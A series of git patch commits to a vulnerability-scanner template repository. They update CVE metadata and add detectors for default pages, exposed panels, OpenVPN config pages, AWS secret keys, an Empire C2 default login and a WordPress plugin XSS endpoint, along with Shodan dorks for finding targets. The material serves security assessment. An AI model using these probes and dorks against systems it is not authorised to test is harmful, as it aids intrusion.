b/cves/2018/CVE-2018-11227.yaml index c10d8ffbfb..a712cb035d 100644 --- a/cves/2018/CVE-2018-11227.yaml +++ b/cves/2018/CVE-2018-11227.yaml @@ -13,6 +13,7 @@ info: cve-id: CVE-2018-11227 metadata: verified: true + shodan-query: http.favicon.hash:419828698 tags: cve,cve2018,xss,mostra,mostracms,cms requests: From 45bc2821844ac22b811354c73835b7b99d9dd6fa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 09:45:26 +0000 Subject: [PATCH 0824/1133] Auto Generated New Template Addition List [Tue Jan 10 09:45:26 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4e50a4ab44..82b129481b 100644 --- a/.new-additions +++ b/.new-additions @@ -6,3 +6,4 @@ exposures/mobiproxy-dashboard.yaml misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml +technologies/monstracms-detect.yaml From f639c84d9442072f9b5e8418ca9d38b945a1862d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 09:54:35 +0000 Subject: [PATCH 0825/1133] Auto Generated CVE annotations [Tue Jan 10 09:54:35 UTC 2023] :robot: --- cves/2022/CVE-2022-4260.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-4260.yaml b/cves/2022/CVE-2022-4260.yaml index b861d59842..306b16c300 100644 --- a/cves/2022/CVE-2022-4260.yaml +++ b/cves/2022/CVE-2022-4260.yaml @@ -3,15 +3,17 @@ id: CVE-2022-4260 info: name: WP-Ban < 1.69.1 - Admin Stored XSS author: Hardik-Solanki - severity: high + severity: medium description: | The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). - remediation: Fixed in version 1.69.1 reference: - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260 - https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk + remediation: Fixed in version 1.69.1 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 cve-id: CVE-2022-4260 cwe-id: CWE-79 metadata: From 75e6011acb96075e75234144a9356b5df4053819 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 10:19:30 +0000 Subject: [PATCH 0826/1133] Auto Generated New Template Addition List [Tue Jan 10 10:19:30 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 82b129481b..d215ea9e3b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2018/CVE-2018-11473.yaml cves/2022/CVE-2022-44877.yaml exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml From 8a2bb3f73f00295a0a6a8f5313181e221fecb325 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 10:20:34 +0000 Subject: [PATCH 0827/1133] Auto Generated New Template Addition List [Tue Jan 10 10:20:34 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d215ea9e3b..6abe376a7f 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2018/CVE-2018-11227.yaml cves/2018/CVE-2018-11473.yaml cves/2022/CVE-2022-44877.yaml exposed-panels/episerver-panel.yaml From 4ce9770b5a9b2b1c43e49fa61013b3fba007152e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 10:35:04 +0000 Subject: [PATCH 0828/1133] Auto Generated CVE annotations [Tue Jan 10 10:35:04 UTC 2023] :robot: --- cves/2018/CVE-2018-11473.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-11473.yaml b/cves/2018/CVE-2018-11473.yaml index 438ae683ad..75eafaaa3b 100644 --- a/cves/2018/CVE-2018-11473.yaml +++ b/cves/2018/CVE-2018-11473.yaml @@ -9,11 +9,15 @@ info: reference: - https://github.com/monstra-cms/monstra/issues/446 - https://nvd.nist.gov/vuln/detail/CVE-2018-11473 + - https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2018-11473 + cwe-id: CWE-79 metadata: - verified: true shodan-query: http.favicon.hash:419828698 + verified: "true" tags: cve,cve2018,xss,mostra,mostracms,cms requests: From 3c413ab78bbec5328cc94d39c7bd0c87d03d2af9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 16:05:48 +0530 Subject: [PATCH 0829/1133] update matcher, added extractor --- technologies/default-cakephp-page.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/technologies/default-cakephp-page.yaml b/technologies/default-cakephp-page.yaml index 2959666f4f..4bbf7079f5 100644 --- a/technologies/default-cakephp-page.yaml +++ b/technologies/default-cakephp-page.yaml @@ -20,9 +20,16 @@ requests: part: body words: - 'Welcome to CakePHP' - - 'the rapid development PHP framework:' + - 'CakePHP Issues' condition: and - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "Welcome to CakePHP ([0-9.]+)" From fd3c08e27477cccbe82eec113934ee4897e4ed9f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 10:41:03 +0000 Subject: [PATCH 0830/1133] Auto Generated New Template Addition List [Tue Jan 10 10:41:03 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6abe376a7f..8226f259d9 100644 --- a/.new-additions +++ b/.new-additions @@ -8,4 +8,5 @@ exposures/mobiproxy-dashboard.yaml misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml +technologies/default-cakephp-page.yaml technologies/monstracms-detect.yaml From 9e57bf05b20b3bcea06731d5c77182a4bbc0c52d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 10:56:28 +0000 Subject: [PATCH 0831/1133] Auto Generated CVE annotations [Tue Jan 10 10:56:28 UTC 2023] :robot: --- cves/2018/CVE-2018-11227.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-11227.yaml b/cves/2018/CVE-2018-11227.yaml index a712cb035d..67ac1186bc 100644 --- a/cves/2018/CVE-2018-11227.yaml +++ b/cves/2018/CVE-2018-11227.yaml @@ -9,11 +9,15 @@ info: reference: - https://github.com/monstra-cms/monstra/issues/438 - https://nvd.nist.gov/vuln/detail/CVE-2018-11227 + - https://www.exploit-db.com/exploits/44646 classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2018-11227 + cwe-id: CWE-79 metadata: - verified: true shodan-query: http.favicon.hash:419828698 + verified: "true" tags: cve,cve2018,xss,mostra,mostracms,cms requests: From b2d9833772c09162a71d91316a9c101230190c87 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 16:38:37 +0530 Subject: [PATCH 0832/1133] Update phpcli-stack-trace.yaml --- misconfiguration/phpcli-stack-trace.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/misconfiguration/phpcli-stack-trace.yaml b/misconfiguration/phpcli-stack-trace.yaml index 8e5a0b2f70..326a070931 100644 --- a/misconfiguration/phpcli-stack-trace.yaml +++ b/misconfiguration/phpcli-stack-trace.yaml @@ -16,11 +16,12 @@ requests: matchers-condition: and matchers: - - type: word + - type: regex part: body - words: - - 'The requested resource /{{randstr}}.php was not found on this server' + regex: + - '/{{randstr}}.php.* this server.' - '404 Not Found' + - '

Not Found

' condition: and - type: word From 17770e07b6afc6b8d1b79eda2d5a68daa5eee768 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 11:29:00 +0000 Subject: [PATCH 0833/1133] Auto Generated New Template Addition List [Tue Jan 10 11:29:00 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8226f259d9..cc7d89b85f 100644 --- a/.new-additions +++ b/.new-additions @@ -8,5 +8,6 @@ exposures/mobiproxy-dashboard.yaml misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml +misconfiguration/phpcli-stack-trace.yaml technologies/default-cakephp-page.yaml technologies/monstracms-detect.yaml From 6c462059fa32d70e59f879c1aa97e591af44b974 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 11:49:16 +0000 Subject: [PATCH 0834/1133] Auto Generated CVE annotations [Tue Jan 10 11:49:16 UTC 2023] :robot: --- cves/2018/CVE-2018-11227.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-11227.yaml b/cves/2018/CVE-2018-11227.yaml index 67ac1186bc..a74455ddc2 100644 --- a/cves/2018/CVE-2018-11227.yaml +++ b/cves/2018/CVE-2018-11227.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.favicon.hash:419828698 verified: "true" - tags: cve,cve2018,xss,mostra,mostracms,cms + tags: cve,cve2018,xss,mostra,mostracms,cms,edb requests: - raw: From 6cc6ea93346b2d196f132e5ce2084573bc768248 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 17:24:05 +0530 Subject: [PATCH 0835/1133] Update stackhawk-api-key.yaml --- file/keys/stackhawk-api-key.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/stackhawk-api-key.yaml b/file/keys/stackhawk-api-key.yaml index c2f7b5f6bf..2f22b4eb63 100644 --- a/file/keys/stackhawk-api-key.yaml +++ b/file/keys/stackhawk-api-key.yaml @@ -3,7 +3,7 @@ id: stackhawk-api-key info: name: StackHawk API Key author: hazana - severity: high + severity: medium reference: - https://docs.stackhawk.com/apidocs.html metadata: From e8f6d74d6703065c0f271dd64f12df85558a0225 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 11:56:08 +0000 Subject: [PATCH 0836/1133] Auto Generated New Template Addition List [Tue Jan 10 11:56:08 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cc7d89b85f..3cf1a913bf 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml exposed-panels/monstra-admin-panel.yaml exposures/mobiproxy-dashboard.yaml +file/keys/stackhawk-api-key.yaml misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml From 3eb51aef591d97c34b543bd8b508b94a73d48491 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 17:48:17 +0530 Subject: [PATCH 0838/1133] update matcher --- default-logins/empire/empirec2-default-login.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/default-logins/empire/empirec2-default-login.yaml b/default-logins/empire/empirec2-default-login.yaml index 3d7dfcf100..125868fb4a 100644 --- a/default-logins/empire/empirec2-default-login.yaml +++ b/default-logins/empire/empirec2-default-login.yaml @@ -7,6 +7,8 @@ info: reference: - https://github.com/BC-SECURITY/Empire - https://bc-security.gitbook.io/empire-wiki/quickstart/configuration/server + metadata: + verified: true tags: default-login,empire requests: @@ -27,10 +29,10 @@ requests: matchers-condition: and matchers: - - type: word + - type: regex part: body - words: - - '"token":"' + regex: + - '{"token":".*"}' - type: word part: header From 994b50aea284292743ec685e948fc56d9f0d0889 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 12:20:35 +0000 Subject: [PATCH 0839/1133] Auto Generated New Template Addition List [Tue Jan 10 12:20:35 UTC 2023] :robot: --- .new-additions | 29 +++++++++++++++-------------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/.new-additions b/.new-additions index d65ee1244a..173fc8c3a4 100644 --- a/.new-additions +++ b/.new-additions @@ -1,14 +1,15 @@ -cves/2018/CVE-2018-11227.yaml -cves/2018/CVE-2018-11473.yaml -cves/2022/CVE-2022-44877.yaml -exposed-panels/episerver-panel.yaml -exposed-panels/freepbx-administration-panel.yaml -exposed-panels/monstra-admin-panel.yaml -exposures/mobiproxy-dashboard.yaml -file/keys/stackhawk-api-key.yaml -misconfiguration/installer/impresspages-installer.yaml -misconfiguration/installer/monstra-installer.yaml -misconfiguration/installer/orangehrm-installer.yaml -misconfiguration/phpcli-stack-trace.yaml -technologies/default-cakephp-page.yaml -technologies/monstracms-detect.yaml \ No newline at end of file +cves/2018/CVE-2018-11227.yaml +cves/2018/CVE-2018-11473.yaml +cves/2022/CVE-2022-44877.yaml +default-logins/empire/empirec2-default-login.yaml +exposed-panels/episerver-panel.yaml +exposed-panels/freepbx-administration-panel.yaml +exposed-panels/monstra-admin-panel.yaml +exposures/mobiproxy-dashboard.yaml +file/keys/stackhawk-api-key.yaml +misconfiguration/installer/impresspages-installer.yaml +misconfiguration/installer/monstra-installer.yaml +misconfiguration/installer/orangehrm-installer.yaml +misconfiguration/phpcli-stack-trace.yaml +technologies/default-cakephp-page.yaml +technologies/monstracms-detect.yaml From ceda422dc016d35b374959155f82169588c1a841 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 17:58:02 +0530 Subject: [PATCH 0840/1133] Update CVE-2022-0234.yaml --- cves/2022/CVE-2022-0234.yaml | 19 +++++-------------- 1 file changed, 5 insertions(+), 14 deletions(-) diff --git a/cves/2022/CVE-2022-0234.yaml b/cves/2022/CVE-2022-0234.yaml index 0a4a98644a..9c9fae899f 100644 --- a/cves/2022/CVE-2022-0234.yaml +++ b/cves/2022/CVE-2022-0234.yaml @@ -10,27 +10,18 @@ info: - https://wpscan.com/vulnerability/fd568a1f-bd51-41bb-960d-f8573b84527b - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0234 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 cve-id: CVE-2022-0234 - cwe-id: CWE-79 - tags: wpscan,cve,cve2022,wordpress,wp-plugin,xss,woocs,authenticated + metadata: + verified: true + google-dork: inurl:"wp-content/plugins/woocommerce-currency-switcher" + tags: cve,cve2022,wordpress,wp-plugin,wp,xss,woocs requests: - raw: - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency= HTTP/1.1 + GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency= HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word From f5040f5e364866142a981ca96bab2d037bfb3d9b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 12:30:58 +0000 Subject: [PATCH 0841/1133] Auto Generated New Template Addition List [Tue Jan 10 12:30:58 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 173fc8c3a4..228e5fb598 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ cves/2018/CVE-2018-11227.yaml cves/2018/CVE-2018-11473.yaml +cves/2022/CVE-2022-0234.yaml cves/2022/CVE-2022-44877.yaml default-logins/empire/empirec2-default-login.yaml exposed-panels/episerver-panel.yaml From d4320076db9b1976b37ae5125ca995857326a75b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 12:32:22 +0000 Subject: [PATCH 0842/1133] Auto Generated New Template Addition List [Tue Jan 10 12:32:22 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 228e5fb598..d02f08ba2f 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ cves/2018/CVE-2018-11227.yaml cves/2018/CVE-2018-11473.yaml cves/2022/CVE-2022-0234.yaml +cves/2022/CVE-2022-29153.yaml cves/2022/CVE-2022-44877.yaml default-logins/empire/empirec2-default-login.yaml exposed-panels/episerver-panel.yaml From 726c115a11d9c2ec4ecd37dbfab485eac3a59bbd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 12:47:52 +0000 Subject: [PATCH 0843/1133] Auto Generated CVE annotations [Tue Jan 10 12:47:52 UTC 2023] :robot: --- cves/2022/CVE-2022-0234.yaml | 8 ++++++-- cves/2022/CVE-2022-29153.yaml | 5 ++++- 2 files changed, 10 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-0234.yaml b/cves/2022/CVE-2022-0234.yaml index 9c9fae899f..644874428b 100644 --- a/cves/2022/CVE-2022-0234.yaml +++ b/cves/2022/CVE-2022-0234.yaml @@ -9,12 +9,16 @@ info: reference: - https://wpscan.com/vulnerability/fd568a1f-bd51-41bb-960d-f8573b84527b - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0234 + - https://plugins.trac.wordpress.org/changeset/2659191 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-0234 + cwe-id: CWE-79 metadata: - verified: true google-dork: inurl:"wp-content/plugins/woocommerce-currency-switcher" - tags: cve,cve2022,wordpress,wp-plugin,wp,xss,woocs + verified: "true" + tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,woocs requests: - raw: diff --git a/cves/2022/CVE-2022-29153.yaml b/cves/2022/CVE-2022-29153.yaml index 4a241cdc17..7c0621ee0b 100644 --- a/cves/2022/CVE-2022-29153.yaml +++ b/cves/2022/CVE-2022-29153.yaml @@ -12,10 +12,13 @@ info: - https://developer.hashicorp.com/consul/docs/discovery/checks - https://nvd.nist.gov/vuln/detail/CVE-2022-29153 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 cve-id: CVE-2022-29153 + cwe-id: CWE-918 metadata: - verified: true shodan-query: title:"Consul by HashiCorp" + verified: "true" tags: cve,cve2022,consul,hashicorp,ssrf requests: From 39f79868aa230a2cdf419baaad30db8e8a61ff31 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 10 Jan 2023 21:01:00 +0530 Subject: [PATCH 0844/1133] Symfony Default Page --- technologies/default-symfony-page.yaml | 35 ++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 technologies/default-symfony-page.yaml diff --git a/technologies/default-symfony-page.yaml b/technologies/default-symfony-page.yaml new file mode 100644 index 0000000000..1cbb0108f3 --- /dev/null +++ b/technologies/default-symfony-page.yaml @@ -0,0 +1,35 @@ +id: default-symfony-page + +info: + name: Symfony Default Page + author: pussycat0x + severity: info + metadata: + verified: true + shodan-query: http.title:"Welcome to Symfony" + tags: tech,symfony,default-page + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome to Symfony!' + - 'Documentation' + condition: and + + - type: status + status: + - 404 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "([0-9.]+)" \ No newline at end of file From 4ef382b0844b48c0f2c10473c69831f87fa4b5fe Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 10 Jan 2023 21:03:58 +0530 Subject: [PATCH 0845/1133] Tengine Default Page --- technologies/default-tengine-page.yaml | 28 ++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 technologies/default-tengine-page.yaml diff --git a/technologies/default-tengine-page.yaml b/technologies/default-tengine-page.yaml new file mode 100644 index 0000000000..fff4007716 --- /dev/null +++ b/technologies/default-tengine-page.yaml @@ -0,0 +1,28 @@ +id: default-tengine-page + +info: + name: Tengine Default Page + author: pussycat0x + severity: info + metadata: + verified: true + shodan-query: http.title:"Welcome to tengine" + tags: tech,tengine,default-page + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome to tengine' + - 'Thank you for using tengine' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 6f4dc249537157cecbf98130908b4233813c4de1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 17:14:04 +0000 Subject: [PATCH 0846/1133] Auto Generated New Template Addition List [Tue Jan 10 17:14:04 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d02f08ba2f..c6dcc38837 100644 --- a/.new-additions +++ b/.new-additions @@ -14,4 +14,5 @@ misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml misconfiguration/phpcli-stack-trace.yaml technologies/default-cakephp-page.yaml +technologies/default-tengine-page.yaml technologies/monstracms-detect.yaml From baf583df59fe304d127c3b7d3e837b055f2062bc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 17:20:16 +0000 Subject: [PATCH 0847/1133] Auto Generated New Template Addition List [Tue Jan 10 17:20:16 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c6dcc38837..9a7117c9b4 100644 --- a/.new-additions +++ b/.new-additions @@ -14,5 +14,6 @@ misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml misconfiguration/phpcli-stack-trace.yaml technologies/default-cakephp-page.yaml +technologies/default-symfony-page.yaml technologies/default-tengine-page.yaml technologies/monstracms-detect.yaml From c1ea26550f6e58716b524a2cc8ebafb2deb54151 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Tue, 10 Jan 2023 12:39:48 -0500 Subject: [PATCH 0848/1133] Create aws-secret-key.yaml --- exposures/tokens/amazon/aws-secret-key.yaml | 33 +++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposures/tokens/amazon/aws-secret-key.yaml diff --git a/exposures/tokens/amazon/aws-secret-key.yaml b/exposures/tokens/amazon/aws-secret-key.yaml new file mode 100644 index 0000000000..a96db99d35 --- /dev/null +++ b/exposures/tokens/amazon/aws-secret-key.yaml @@ -0,0 +1,33 @@ +id: aws-secret-key + +info: + name: AWS Secret Access Key + author: tess + severity: unknown + metadata: + verified: "true" + tags: secret,aws,generic,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + + - type: word + words: + - 'accessKeyId' + - 'secretAccessKey' + part: body + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 1aa26732973e130917fc2d16278d77e5ddb0ce08 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Tue, 10 Jan 2023 13:18:45 -0500 Subject: [PATCH 0849/1133] Create dash-panel-detect.yaml --- technologies/dash-panel-detect.yaml | 34 +++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 technologies/dash-panel-detect.yaml diff --git a/technologies/dash-panel-detect.yaml b/technologies/dash-panel-detect.yaml new file mode 100644 index 0000000000..6f43918bfa --- /dev/null +++ b/technologies/dash-panel-detect.yaml @@ -0,0 +1,34 @@ +id: dash-panel-detect + +info: + name: Dash Panel Detect + author: tess + severity: info + metadata: + verified: "true" + shodan-dork: http.title:"Dash" + tags: dash,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + + - type: word + words: + - 'Dash' + - '_dash-config' + part: body + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From d2278840d36e0f627f1616390663c38753bd6495 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Tue, 10 Jan 2023 14:11:06 -0500 Subject: [PATCH 0850/1133] Create ovpn-config-exposed.yaml --- exposures/configs/ovpn-config-exposed.yaml | 34 ++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposures/configs/ovpn-config-exposed.yaml diff --git a/exposures/configs/ovpn-config-exposed.yaml b/exposures/configs/ovpn-config-exposed.yaml new file mode 100644 index 0000000000..9749255b78 --- /dev/null +++ b/exposures/configs/ovpn-config-exposed.yaml @@ -0,0 +1,34 @@ +id: ovpn-config-exposed + +info: + name: OVPN Config Download + author: tess + severity: low + metadata: + verified: "true" + shodan-dork: http.title:"OVPN Config Download" + tags: ovpn,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + + - type: word + words: + - 'OVPN Config Download' + - 'Config List' + part: body + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 46aa34d16dbfbe9f91a92a2974711ab1070c1d96 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 11 Jan 2023 03:13:47 +0530 Subject: [PATCH 0851/1133] Update dash-panel-detect.yaml --- technologies/dash-panel-detect.yaml | 20 ++++++++------------ 1 file changed, 8 insertions(+), 12 deletions(-) diff --git a/technologies/dash-panel-detect.yaml b/technologies/dash-panel-detect.yaml index 6f43918bfa..39856a3633 100644 --- a/technologies/dash-panel-detect.yaml +++ b/technologies/dash-panel-detect.yaml @@ -6,28 +6,24 @@ info: severity: info metadata: verified: "true" - shodan-dork: http.title:"Dash" - tags: dash,exposure + shodan-dork: html:"DashRenderer" + tags: tech,dash requests: - method: GET path: - - '{{BaseURL}}/' + - '{{BaseURL}}' + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - - type: word - words: - - 'Dash' - - '_dash-config' part: body - condition: and - - - type: word - part: header words: - - "text/html" + - '_dash-config' + - 'DashRenderer' + condition: and - type: status status: From a2c27aee68e9a46d6719d4b7cb00eba5c3b0121c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 11 Jan 2023 03:21:53 +0530 Subject: [PATCH 0852/1133] Update ovpn-config-exposed.yaml --- exposures/configs/ovpn-config-exposed.yaml | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/exposures/configs/ovpn-config-exposed.yaml b/exposures/configs/ovpn-config-exposed.yaml index 9749255b78..010ff92039 100644 --- a/exposures/configs/ovpn-config-exposed.yaml +++ b/exposures/configs/ovpn-config-exposed.yaml @@ -7,28 +7,24 @@ info: metadata: verified: "true" shodan-dork: http.title:"OVPN Config Download" - tags: ovpn,exposure + tags: config,ovpn,exposure requests: - method: GET path: - - '{{BaseURL}}/' + - '{{BaseURL}}' + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - - type: word + part: body words: - 'OVPN Config Download' - 'Config List' - part: body condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 19df8970a35909b9c9ed59c79e9fdd426db917c7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 21:52:33 +0000 Subject: [PATCH 0853/1133] Auto Generated New Template Addition List [Tue Jan 10 21:52:33 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9a7117c9b4..9e853d9cab 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml misconfiguration/phpcli-stack-trace.yaml +technologies/dash-panel-detect.yaml technologies/default-cakephp-page.yaml technologies/default-symfony-page.yaml technologies/default-tengine-page.yaml From 8883da943d84f235bdde0458d7a1431c05bf0f7f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 21:53:52 +0000 Subject: [PATCH 0854/1133] Auto Generated New Template Addition List [Tue Jan 10 21:53:51 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9e853d9cab..eb1caf72c3 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ default-logins/empire/empirec2-default-login.yaml exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml exposed-panels/monstra-admin-panel.yaml +exposures/configs/ovpn-config-exposed.yaml exposures/mobiproxy-dashboard.yaml file/keys/stackhawk-api-key.yaml misconfiguration/installer/impresspages-installer.yaml From c19d6b1e1a1359f6cb57b236d8e02b42a416f69d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 11 Jan 2023 04:02:18 +0000 